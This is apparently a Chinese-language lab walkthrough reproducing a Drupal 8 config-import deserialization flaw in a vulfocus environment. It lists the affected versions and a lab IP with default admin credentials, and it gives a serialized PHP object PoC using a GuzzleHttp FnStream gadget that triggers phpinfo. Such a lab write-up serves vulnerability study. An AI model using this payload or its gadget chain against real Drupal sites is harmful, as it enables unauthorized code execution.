影响版本

Drupal Drupal 8.3.3

Drupal Drupal 8.3.2

Drupal Drupal 8.3.1

Drupal Drupal 8.2.8

Drupal Drupal 8.2.7

Drupal Drupal 8.2.3

Drupal Drupal 8.2.2

漏洞环境:

vulfocus一键启动(默认管理员amin/admin123)

1.登录管理员账号

2.访问如下连接:

http://188.40.189.135:28942/admin/config/development/configuration/single/import

3.如下图所示,Configuration type 选择 Simple configurationConfiguration name 任意填写,Paste your configuration here 中填写PoC如下

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

4.点击 Import 后可以看到漏洞触发成功,弹出 phpinfo 页面

大概就这些……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...